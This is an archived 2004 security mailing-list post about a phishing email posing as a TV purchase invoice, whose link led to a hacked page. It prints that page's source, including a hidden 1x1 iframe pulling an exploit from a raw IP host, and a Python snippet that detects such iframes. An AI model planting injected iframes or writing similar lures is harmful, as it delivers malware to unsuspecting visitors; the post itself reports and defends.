Dailydave mailing list archives

Interesting hack attempt!


From: Dave Aitel <dave () immunitysec com>
Date: Thu, 13 May 2004 12:00:40 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Someone sent me a message:

Thank you for shopping with BuyHYQ. Please keep this email invoice for
your records.

On May, 12 2004 we shipped your order number 91782656 for the
following item:

INV. NO.  H139-22192

1 S452-2700    Syntax Olevia 27" WXGA LCD TV      $1,399.99

To track the shipping status of your BuyHYQ order, visit our Order Status
page at:
http://www.bhyq.net/billing/orderstatus.php?91782656

$1,399.99 Has Been Charged To Your VISA Account.

I was bored, so I clicked on the obvious hack attempt (I don't even
own a VISA) and Mozilla promptly took up all the memory on my system.
...
brk(0)                                  = 0x1b920000
brk(0x1b92d000)                         = 0x1b92d000
brk(0)                                  = 0x1b92d000
brk(0x1b93d000)                         = 0x1b93d000
brk(0)                                  = 0x1b93d000
brk(0x1b94a000)                         = 0x1b94a000
brk(0)                                  = 0x1b94a000
brk(0x1b94d000)                         = 0x1b94d000
brk(0)                                  = 0x1b94d000
...

[dave@localhost CANVAS]$ lynx --source http://www.bhyq.net/billing/orderstatus.php?91782651
<html>
<head>
<title>BuyHYQ Order Status Page</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN">
<meta http-equiv="Refresh" content="2;
URL=http://www.bhyq.net/billing/status.html";>
<META NAME="revisit-after" CONTENT="7 days">
<META NAME="robots" CONTENT="FOLLOW,INDEX">
</head>
<BODY BGCOLOR=white color=black LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0
MARGINHEIGHT=0>
<IFRAME SRC="http://65.75.137.180/exploit.htm"; WIDTH=1 HEIGHT=1
border=0></IFRAME>

<!-- Hacked by TNT Team -->
<center>
Loading your order info, please wait...
</center>
</body>
</html>

The exploit is missing now, but it was interesting to see! Way to go guys!

- -dave

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAo5uozOrqAtg8JS8RAl0sAJ9iH9vChnfQGX0nRBwkO4RuskfANQCbB1Ze
mKBtD3ebLp7mMSG6KV1OfZM=
=PeH5
-----END PGP SIGNATURE-----

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
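
Added example, not part of the original post: a Python check for the pattern visible in the page source above, an iframe that loads from a different host and is sized to be invisible. The function names, the 2-pixel threshold and the sample hosts are assumptions chosen for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

def is_tiny(value, limit=2):  # width/height is a pixel count <= limit
    v = (value or "").strip().lower().replace("px", "")
    return v.isdigit() and int(v) <= limit

def is_raw_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

class IframeAudit(HTMLParser):
    """Flag cross-host iframes that are invisible or addressed by raw IP."""
    def __init__(self, page_url):
        super().__init__()
        self.page_host = urlparse(page_url).hostname
        self.findings = []  # (src, [reasons])
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "").strip()
        host = urlparse(src).hostname
        if not host or host == self.page_host:
            return  # relative or same-host frame
        reasons = []
        if is_tiny(a.get("width")) and is_tiny(a.get("height")):
            reasons.append("near-zero size")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if is_raw_ip(host):
            reasons.append("raw IP host")
        if reasons:
            self.findings.append((src, reasons))

def audit_iframes(html, page_url):
    parser = IframeAudit(page_url)
    parser.feed(html)
    return parser.findings

# Constructed sample modeled on the page source in the post; hosts are placeholders.
PAGE_URL = "http://www.shop.example/billing/orderstatus.php"
SAMPLE = """<IFRAME SRC="http://192.0.2.10/x.htm" WIDTH=1 HEIGHT=1 border=0></IFRAME>
<iframe src="http://cdn.partner.example/w.html" width="300" height="250"></iframe>"""
```

Calling `audit_iframes(SAMPLE, PAGE_URL)` reports only the 1x1 frame; the normally sized third-party frame is left alone, as are relative and same-host frames.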

